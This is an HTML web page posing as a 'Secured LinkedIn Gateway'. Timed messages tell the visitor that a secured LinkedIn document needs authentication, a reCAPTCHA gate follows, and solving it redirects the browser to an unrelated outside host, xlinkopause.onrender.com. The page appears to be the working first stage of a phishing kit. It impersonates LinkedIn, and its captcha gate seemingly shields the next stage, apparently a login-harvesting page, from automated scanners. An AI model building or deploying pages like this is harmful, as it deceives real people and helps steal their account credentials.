<!doctype html>
<html lang="en">

<head>
  <title>Secured LinkedIn Gateway</title>
  <link rel="stylesheet" href="css/style.css">
  <script src="https://www.google.com/recaptcha/api.js" async defer></script>

  <style>
	#loader-wrapper {
		position: fixed;
		top: 0;
		left: 0;
		width: 100%;
		height: 100%;
		z-index: 1000;
	}
	#loader {
		display: block;
		position: relative;
		left: 50%;
		top: 50%;
		width: 150px;
		height: 150px;
		margin: -75px 0 0 -75px;
		border-radius: 50%;
		border: 3px solid transparent;
		border-top-color: #3498db;
		-webkit-animation: spin 2s linear infinite; /* Opera 15+, Safari 5+ */
		animation: spin 2s linear infinite; /* Firefox 16+, IE 10+, Opera */
	}
	#loader-text {
		display: block;
		position: relative;
		left: 45%;
		top: 65%;
		width: 450px;
		height: 50px;
		margin: -75px 0 0 -75px;
		font-size:20px;
		font-weight: bold;
	}
	#loader:before {
		content: "";
		position: absolute;
		top: 5px;
		left: 5px;
		right: 5px;
		bottom: 5px;
		border-radius: 50%;
		border: 3px solid transparent;
		border-top-color: #e74c3c;
		-webkit-animation: spin 3s linear infinite; /*  Opera 15+, Safari 5+ */
		  animation: spin 3s linear infinite; /* Firefox 16+, IE 10+, Opera */
	}
	 
	#loader:after {
		content: "";
		position: absolute;
		top: 15px;
		left: 15px;
		right: 15px;
		bottom: 15px;
		border-radius: 50%;
		border: 3px solid transparent;
		border-top-color: #f9c922;
		-webkit-animation: spin 1.5s linear infinite; /*  Opera 15+, Safari 5+ */
		  animation: spin 1.5s linear infinite; /* Firefox 16+, IE 10+, Opera */
	}
	 
	
	@-webkit-keyframes spin {
		0%   {
			-webkit-transform: rotate(0deg);  /*  Opera 15+, Safari 3.1+ */
			-ms-transform: rotate(0deg);  /* IE 9 */
			transform: rotate(0deg);  /* Firefox 16+, IE 10+, Opera */
		}
		100% {
			-webkit-transform: rotate(360deg);  /* Opera 15+, Safari 3.1+ */
			-ms-transform: rotate(360deg);  /* IE 9 */
			transform: rotate(360deg);  /* Firefox 16+, IE 10+, Opera */
		}
	}
	@keyframes spin {
		0%   {
			-webkit-transform: rotate(0deg);  /* Opera 15+, Safari 3.1+ */
			-ms-transform: rotate(0deg);  /* IE 9 */
			transform: rotate(0deg);  /* Firefox 16+, IE 10+, Opera */
		}
		100% {
			-webkit-transform: rotate(360deg);  /* Opera 15+, Safari 3.1+ */
			-ms-transform: rotate(360deg);  /* IE 9 */
			transform: rotate(360deg);  /* Firefox 16+, IE 10+, Opera */
		}
	}
  </style>
</head>

<body>

	<div id="loader-wrapper">
		<div id="loader-text">
			<span id="1st">Searching for your Secured LinkedIn Document...</span>
			<span id="2nd" style="display:none;">Your LinkedIn Document is secure and requires authentication to view Document...</span>
			<form id="3rd" style="display:none;" method="post" onsubmit="return submitUserForm();">
				<div class="g-recaptcha" data-sitekey="6LcpfeEUAAAAAI3jeSnJx5Vi-nURnp7U7919DOLQ" data-callback="verifyCaptcha"></div>
				<div id="g-recaptcha-error"></div>
			</form>
		</div>
		<div id="loader"></div>
	</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="js/scripts.js"></script>
</body>

<script>
	setTimeout(function () {$("#1st").hide();}, 4000);
	setTimeout(function () {$("#2nd").show();}, 4000);
	setTimeout(function () {$("#2nd").hide();}, 6000);
	setTimeout(function () {$("#3rd").show();}, 6000);
	setTimeout(function () {$("#loader").hide();}, 6000);

	function submitUserForm() {
    var response = grecaptcha.getResponse();
    if(response.length == 0) {
        document.getElementById('g-recaptcha-error').innerHTML = '<span style="color:red;">This field is required.</span>';
        return false;
    }
		return true;
	}
	 
	function verifyCaptcha() {
		document.getElementById('g-recaptcha-error').innerHTML = '';
		console.log("works until here");
		window.location.replace("https://xlinkopause.onrender.com");
	}
</script>
</html>